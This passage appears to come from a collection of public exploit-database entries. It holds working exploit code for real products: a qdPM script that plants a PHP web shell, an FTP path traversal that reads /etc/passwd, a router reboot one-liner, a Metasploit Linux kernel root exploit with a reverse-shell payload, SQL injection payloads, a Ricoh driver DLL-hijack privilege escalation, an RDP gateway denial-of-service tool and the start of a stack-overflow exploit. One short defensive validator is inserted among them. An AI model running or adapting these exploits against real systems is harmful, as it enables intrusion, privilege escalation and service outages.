except:
    print("File cannot be created.")
10. # Exploit Title: qdPM 9.1 - Remote Code Execution
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2020-01-22
# Exploit Author: Rishal Dwivedi (Loginsoft)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Windows 10 (Python 2.7)
# CVE : CVE-2020-7246

# Exploit written in Python 2.7
# Tested Environment - Windows 10
# Path Traversal + Remote Code Execution
# Command - qdpm-exploit.py -url http://localhost/ -u [email protected] -p password

# -*- coding: utf-8 -*-
#!/usr/bin/python

import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()


def multifrm(
    userid,
    username,
    csrftoken_,
    EMAIL,
    HOSTNAME,
    uservar,
    ):
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
        }
    return request_1


def req(
    userid,
    username,
    csrftoken_,
    EMAIL,
    HOSTNAME,
    ):
    request_1 = multifrm(
        userid,
        username,
        csrftoken_,
        EMAIL,
        HOSTNAME,
        '.htaccess',
        )
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)
    request_2 = multifrm(
        userid,
        username,
        csrftoken_,
        EMAIL,
        HOSTNAME,
        '../.htaccess',
        )
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),
        }
    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)


def main(HOSTNAME, EMAIL, PASSWORD):
    result = session_requests.get(HOSTNAME + '/index.php/login')
    login_tree = html.fromstring(result.text)
    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}
    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
    account_tree = html.fromstring(account_page.content)
    userid = account_tree.xpath("//input[@name='users[id]']/@value")
    username = account_tree.xpath("//input[@name='users[name]']/@value")
    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
    final_tree = html.fromstring(get_file.content)
    backdoor = final_tree.xpath("//input[@name='users[photo_preview]']/@value")
    print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' + backdoor[-1] + '?cmd=whoami'


if __name__ == '__main__':
    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')
    parser.add_argument('-p', '--password', dest='password', help='User password')
    args = parser.parse_args()
    main(args.hostname, args.email, args.password)
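The exploit above relies on the server accepting two things in the photo fields: a `photo_preview` value that walks out of the upload directory (`../.htaccess`, deleted via `remove_photo`) and an upload whose stored name the web server will execute (`backdoor.php`). The following is an added example from the defending side, not qdPM's code or the post's: a file-name validator plus a root-confinement check that an upload and delete handler would call before touching disk. The upload root path and the `remove_photo` handler are assumptions of this example.

```python
import os

# Only plain image extensions are ever stored; '.php', '.htaccess' and friends
# are rejected by construction rather than by a blocklist.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def validate_photo_name(name: str) -> str:
    """Return `name` unchanged if it is a bare image file name, else raise.

    Rejects path separators (so '../.htaccess' never reaches a join), NUL
    bytes (which truncate names in C-backed filesystems), dotfiles (so a
    stored '.htaccess' cannot override server configuration) and any
    extension that is not an image (so 'backdoor.php' is never written).
    """
    if not name or name != name.strip():
        raise ValueError("empty or whitespace-padded name")
    if "\x00" in name or "/" in name or "\\" in name:
        raise ValueError("path separators and NUL are not allowed")
    if name.startswith("."):
        raise ValueError("dotfiles such as .htaccess are not allowed")
    stem, ext = os.path.splitext(name)
    if not stem or ext.lower() not in ALLOWED_EXT:
        raise ValueError("only image extensions are allowed")
    return name


def is_safe_photo_name(name: str) -> bool:
    """Boolean wrapper around validate_photo_name for callers that do not raise."""
    try:
        validate_photo_name(name)
        return True
    except ValueError:
        return False


def resolve_in_root(upload_root: str, name: str) -> str:
    """Absolute path of `name` inside `upload_root`, or ValueError.

    Second line of defence: even if the name check were loosened later,
    the realpath/commonpath comparison stops anything outside the root.
    """
    safe_name = validate_photo_name(name)
    root = os.path.realpath(upload_root)
    full = os.path.realpath(os.path.join(root, safe_name))
    if os.path.commonpath([root, full]) != root:
        raise ValueError("resolved path escapes the upload root")
    return full


def remove_photo(upload_root: str, name: str) -> bool:
    """The delete step the exploit abuses, done safely (assumed handler).

    Returns True if a file was removed, False if nothing by that name exists.
    """
    full = resolve_in_root(upload_root, name)
    if not os.path.isfile(full):
        return False
    os.remove(full)
    return True
```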
11. # Exploit Title: Pachev FTP Server 1.0 - Path Traversal
# Date: 2020-01-23
# Vulnerability: Path Traversal
# Exploit Author: 1F98D
# Vendor Homepage: https://github.com/pachev/pachev_ftp

from ftplib import FTP

ip = raw_input("Target IP: ")
port = int(raw_input("Target Port: "))

ftp = FTP()
ftp.connect(host=ip, port=port)
ftp.login('pachev', '')
ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
ftp.close()

file = open('passwd.txt', 'r')
print "[**] Printing the contents of /etc/passwd\n"
print file.read()
12. # Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
# Date: 2020-01-20
# Exploit Author: PCEumel
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware
# Version: TP-Link TP-SG105E V4
# Tested on: TP-SG105E V4 1.0.0 Build 20181120
# Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
# CVE : CVE-2019-16893

# TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot

# The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".
# It features a web front end and an application (Easy Smart Configuration Utility)
# for easy configuration management.

# The device does not properly restrict access to an internal API.
# It is therefore possible to remotely reboot the device by sending a HTTP POST
# request.

---
# POC :

curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi

---
Timeline :
2019-09-16 | Vendor notified
2019-09-25 | Reply (they will patch it)
2019-12-24 | First patch for testing
2019-12-19 | Confirmed the functionality of the patch
2020-01-14 | Public patch available
13. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on Linux systems by abusing
        a NULL pointer dereference in the `rds_atomic_free_op` function in the
        Reliable Datagram Sockets (RDS) kernel module (rds.ko).

        Successful exploitation requires the RDS kernel module to be loaded.
        If the RDS module is not blacklisted (default); then it will be loaded
        automatically.

        This exploit supports 64-bit Ubuntu Linux systems, including distributions
        based on Ubuntu, such as Linux Mint and Zorin OS.

        Target offsets are available for:

        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.

        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
        Failed exploitation may crash the kernel.

        This module has been tested successfully on various 4.4 and 4.8 kernels.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mohamed Ghannam', # Discovery of RDS rds_atomic_free_op null pointer dereference and DoS PoC (2018-5333)
          'Jann Horn',       # Discovery of MAP_GROWSDOWN mmap_min_addr bypass technique and PoC code (CVE-2019-9213)
          'wbowling',        # C exploit combining 2018-5333 and CVE-2019-9213 targeting Ubuntu 16.04 kernel 4.4.0-116-generic
          'bcoles',          # Metasploit module and updated C exploit
          'nstarke'          # Additional kernel offsets
        ],
      'DisclosureDate' => '2018-11-01',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'Privileged'     => true,
      'References'     =>
        [
          [ 'CVE', '2018-5333' ],
          [ 'CVE', '2019-9213' ],
          [ 'BID', '102510' ],
          [ 'URL', 'https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4' ],
          [ 'URL', 'https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c' ],
          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2' ],
          [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d' ],
          [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c' ]
        ],
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
        },
      'Notes'          =>
        {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_OS_DOWN ],
        },
      'DefaultTarget'  => 0))
    register_advanced_options [
      OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def check
    arch = kernel_hardware
    unless arch.include? 'x86_64'
      return CheckCode::Safe("System architecture #{arch} is not supported")
    end
    vprint_good "System architecture #{arch} is supported"

    offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
    kernels = offsets.scan(/"(.+?)"/).flatten

    version = "#{kernel_release} #{kernel_version.split(' ').first}"
    unless kernels.include? version
      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
    end
    vprint_good "Linux kernel #{version} is vulnerable"

    if smap_enabled?
      return CheckCode::Safe('SMAP is enabled')
    end
    vprint_good 'SMAP is not enabled'

    if lkrg_installed?
      return CheckCode::Safe('LKRG is installed')
    end
    vprint_good 'LKRG is not installed'

    if grsec_installed?
      return CheckCode::Safe('grsecurity is in use')
    end
    vprint_good 'grsecurity is not in use'

    unless kernel_modules.include? 'rds'
      vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'
      return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation')
    end
    vprint_good 'rds.ko kernel module is loaded'

    CheckCode::Appears
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.out')
    end
    register_file_for_cleanup exploit_path

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe
    register_file_for_cleanup payload_path

    # mincore KASLR bypass is usually fast, but can sometimes take up to 30 seconds to complete
    timeout = 30
    print_status "Launching exploit (timeout: #{timeout})..."
    output = cmd_exec("echo '#{payload_path} & exit' | #{exploit_path}", nil, timeout)
    output.each_line { |line| vprint_status line.chomp }
  end
end
14. # Exploit Title: Webtareas 2.0 - 'id' SQL Injection
# Date: 2020-01-23
# Exploit Author: Greg.Priest
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: Webtareas v2.0
# Tested on: Windows
# CVE : N/A

Webtareas v2.0 authenticated SQL injection 0day

Vulnerable Request:

POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 10.61.57.147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 98
Origin: http://10.61.57.147
Connection: close
Referer: http://10.61.57.147/webtareas/general/home.php?
Cookie: webTareasSID=npmmte1hejtnsi35mcqbc97gse

action=cardview-actions&prefix=..%2F&object=projects&tblnam=projects&extra=&extpath=&id=1[Vulnerable parameter!]&defact=Y

--------------------------------------------------------------------------------------------------------------------------

C:\Users\--------\Desktop\sqlmap>sqlmap.py -r webt01
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.1.17#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:09:44 /2020-01-23/

[12:09:44] [INFO] parsing HTTP request from 'webt01'
[12:09:45] [WARNING] provided value for parameter 'extra' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:09:45] [WARNING] provided value for parameter 'extpath' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:09:45] [INFO] resuming back-end DBMS 'mysql'
[12:09:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND 4597=4597 AND 'yvIt'='yvIt&defact=Y

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND (SELECT 4838 FROM (SELECT(SLEEP(5)))WYXW) AND 'lBki'='lBki&defact=Y
---
[12:09:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.13
back-end DBMS: MySQL >= 5.0.12
[12:09:45] [INFO] fetched data logged to text files under 'C:\Users\--------\AppData\Local\sqlmap\output\10.61.57.147'

[*] ending @ 12:09:45 /2020-01-23/

https://github.com/Gr3gPr1est/BugReport/blob/master/WebTareas2.0_Authenticated_SQLinjection_0day.pdf
15. # Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
# Google Dork: intext:"TopManage ® 2002 - 2020"
# Date: 2020-01-13
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: http://www.topmanage.com/
# Software Link: http://www.topmanage.com/microsites/olk-web-store/
# Version: 2020
# Tested on: N/A
# CVE : N/A
# Reference: https://websec.nl/news.php

POST /olk/client/login.asp HTTP/1.1
Host: examplesite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://examplesite.com
Connection: close
Referer: https://examplesite.com/olk/client/login.asp?se=Y
Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
Upgrade-Insecure-Requests: 1

dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=
16. # Exploit Title: Genexis Platinum-4410 2.1 - Authentication Bypass
# Date: 20220-01-08
# Exploit Author: Husinul Sanub
# Author Contact: https://www.linkedin.com/in/husinul-sanub-658239106/
# Vulnerable Product: Genexis Platinum-4410 v2.1 Home Gateway Router https://genexis.co.in/product/ont/
# Firmware version: P4410-V2-1.28
# Vendor Homepage: https://genexis.co.in/
# Reference: https://medium.com/@husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206
# CVE: CVE-2020-6170

Vulnerability Details
======================

Genexis Platinum-4410 v2.1 Home Gateway Router discloses the passwords of each user (Admin, GENEXIS, user3) in plain text in the login page source "http://192.168.1.1/cgi-bin/index2.asp". This could potentially allow a remote attacker to access sensitive information and perform actions such as resetting the router, changing passwords, uploading malicious firmware etc.

How to reproduce
===================

Suppose 192.168.1.1 is the router IP. View the page source of the login page "http://192.168.1.1/cgi-bin/index2.asp"; there the passwords for each login account can be found in clear text.

POC
=========

* https://youtu.be/IO_Ez4XH-0Y
17. /*
This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites a DLL file before the library is loaded (CVE-2019-19363).
Written by Pentagrid AG, 2019. Cf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/
Credits: Alexander Pudwill

This proof of concept code is based on the ReadDirectoryChangesW API call to get notified about changes on files and directories and reuses parts from the example from https://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html
*/

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <windows.h>

#define MAX_BUFFER 4096

int change_counter = 0;
const WCHAR * const BaseDirName = L"C:\\ProgramData";
const WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;
DWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE | FILE_NOTIFY_CHANGE_SIZE | FILE_NOTIFY_CHANGE_LAST_ACCESS | FILE_NOTIFY_CHANGE_CREATION;

typedef struct _DIRECTORY_INFO {
    HANDLE hDir;
    TCHAR lpszDirName[MAX_PATH];
    CHAR lpBuffer[MAX_BUFFER];
    DWORD dwBufLength;
    OVERLAPPED Overlapped;
} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;

DIRECTORY_INFO DirInfo;

void WINAPI HandleDirectoryChange(DWORD dwCompletionPort)
{
    DWORD numBytes, cbOffset;
    LPDIRECTORY_INFO di;
    LPOVERLAPPED lpOverlapped;
    PFILE_NOTIFY_INFORMATION fni;
    WCHAR FileName[MAX_PATH];

    do {
        GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);
        if (di) {
            fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;
            do {
                cbOffset = fni->NextEntryOffset;

                // get filename
                size_t num_elem = fni->FileNameLength / sizeof(WCHAR);
                if (num_elem >= sizeof(FileName) / sizeof(WCHAR))
                    num_elem = 0;
                wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem);
                FileName[num_elem] = '\0';

                wprintf(L"+ Event for %s [%d]\n", FileName, change_counter);

                if (fni->Action == FILE_ACTION_MODIFIED) {
                    if (!wcscmp(FileName, TargetDLLRelFilePath)) {
                        if (change_counter > 0)
                            change_counter--;
                        if (change_counter == 0) {
                            change_counter--;
                            if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))
                                wprintf(L"+ File %s copied to %s.\n", MaliciousLibraryFile, TargetDllFullFilePath);
                            else {
                                wchar_t buf[256];
                                FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), buf, (sizeof(buf) / sizeof(wchar_t)), NULL);
                                wprintf(L"+ Failed to copy file %s to %s: %s\n", MaliciousLibraryFile, TargetDllFullFilePath, buf);
                            }
                            exit(1);
                        } // end of trigger part
                    }
                } // eo action mod

                fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset);
            } while (cbOffset);

            // Reissue the watch command
            ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);
        }
    } while (di);
}

void WINAPI InstallPrinter()
{
    WCHAR cmd_buf[1000];
    swprintf(cmd_buf, sizeof(cmd_buf), L"/c rundll32 printui.dll, PrintUIEntry /if /b \"Printer\" /r lpt1: /m \"%s\"", PrinterName);
    wprintf(L"+ Adding printer: %s\n", cmd_buf);
    unsigned long ret = (unsigned long) ShellExecuteW(0, L"open", L"cmd", cmd_buf, NULL, SW_HIDE);
    if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.
        wprintf(L"+ Failed launching command. Return value is %d\n", ret);
}

void WINAPI WatchDirectories(HANDLE hCompPort)
{
    DWORD tid;
    HANDLE hThread;

    ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);

    // Create a thread to sit on the directory changes
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);

    // Just loop and wait for the user to quit
    InstallPrinter();
    while (_getch() != 'q');

    // The user has quit - clean up
    PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);

    // Wait for the Directory thread to finish before exiting
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
}

int wmain(int argc, WCHAR *argv[])
{
    HANDLE hCompPort = NULL; // Handle To a Completion Port

    if (argc == 6) {
        PrinterName = argv[1];
        TargetDllFullFilePath = argv[2];
        TargetDLLRelFilePath = argv[3];
        MaliciousLibraryFile = argv[4];
        change_counter = _wtoi(argv[5]);
    } else {
        wprintf(L"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\n", argv[0]);
        return 0;
    }

    wprintf(L"+ Monitoring directory %s\n", BaseDirName);

    // Get a handle to the directory
    DirInfo.hDir = CreateFile(BaseDirName, FILE_LIST_DIRECTORY, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED, NULL);
    if (DirInfo.hDir == INVALID_HANDLE_VALUE) {
        wprintf(L"Unable to open directory %s. GLE=%ld. Terminating...\n", BaseDirName, GetLastError());
        return 0;
    }
    lstrcpy(DirInfo.lpszDirName, BaseDirName);

    if (HANDLE hFile = CreateFile(TargetDllFullFilePath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) {
        wprintf(L"+ File %s created\n", TargetDllFullFilePath);
        CloseHandle(hFile);
    } else
        wprintf(L"+ File %s could not be created\n", TargetDllFullFilePath);

    if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {
        wprintf(L"+ CreateIoCompletionPort() failed.\n");
        return 0;
    }

    wprintf(L"+ Press <q> to exit\n");

    // Start watching
    WatchDirectories(hCompPort);

    CloseHandle(DirInfo.hDir);
    CloseHandle(hCompPort);
    return 1;
}
18. #include "BlueGate.h"

/*
EDB Note:
- Download (Binary) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-1.exe
- Download (Source) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-2.zip
*/

void error(const char* msg)
{
    printf("ERROR: %s\n", msg);
    exit(EXIT_FAILURE);
}

void SOCKInit()
{
    WSADATA wsaData;
    int res;

    res = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (res != 0)
        error("WSAStartup failed");
}

void DTLSInit()
{
    SSL_library_init();
    SSL_load_error_strings();
    ERR_load_BIO_strings();
    OpenSSL_add_all_algorithms();
}

int OpenUDPConnection(const char* hostname, int port)
{
    int sockfd;
    sockaddr_in addr;

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0)
        error("Failed to open socket");

    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    inet_pton(AF_INET, hostname, &(addr.sin_addr));

    if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0)
    {
        closesocket(sockfd);
        error("Failed to connect socket");
    }

    return sockfd;
}

SSL* DTLSConnection(const char* hostname)
{
    int sockfd;
    int result;
    DTLSParams client;

    sockfd = OpenUDPConnection(hostname, 3391);

    client.ctx = SSL_CTX_new(DTLS_client_method());
    client.bio = BIO_new_ssl_connect(client.ctx);
    BIO_set_conn_hostname(client.bio, hostname);
    BIO_get_ssl(client.bio, &(client.ssl));
    SSL_set_connect_state(client.ssl);
    SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY);
    SSL_set_fd(client.ssl, sockfd);

    if (SSL_connect(client.ssl) != 1)
    {
        return NULL;
    }

    return client.ssl;
}

int send_dos_packet(SSL* ssl, int id)
{
    CONNECT_PKT_FRAGMENT packet;

    packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT;
    packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER);
    packet.usFragmentID = id;
    packet.usNoOfFragments = id;
    packet.cbFragmentLength = 1000;
    memset(packet.fragment, 0x41, 1000);

    char pkt[sizeof(packet)];
    memcpy(&pkt, &packet, sizeof(packet));

    return SSL_write(ssl, pkt, sizeof(pkt));
}

int main(int argc, char* argv[])
{
    SSL* ssl;
    int i = 0;
    char* hostname;

    if (argc != 2)
    {
        printf("Usage: %s <IP address>\n", argv[0]);
        return 0;
    }

    hostname = argv[1];

    SOCKInit();
    DTLSInit();

    while (i++ > -1)
    {
        ssl = DTLSConnection(hostname);
        if (ssl == NULL)
        {
            break;
        }

        for (int n = 0; n < 4; n++)
        {
            send_dos_packet(ssl, i+n);
            printf("Sending packet [%u]\n", i + n);
        }
        i++;
    }

    return 0;
}
20. # Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
# 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
# 2) run python script & open created 'crash.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash

#!/usr/bin/python

# Bad Chars
# \x00 => \x20
# \x0d Truncates buffer
# \x2d Gets ejected from buffer
# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper
# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper
# \x9a => \x8a
# \x9c => \x8c
# \x9e => \x8e
# \xe0-\xef => \xc0-\xcf
# \xf0-\xf6 => \xd0-\xd6
# \xf8-\xfe => \xd8-\xde
# \xff => \x9f
# badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'

# Max shellcode size is 2384 bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes

## msfvenom x86/alpha_uppers GetPC Routine ##
# [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
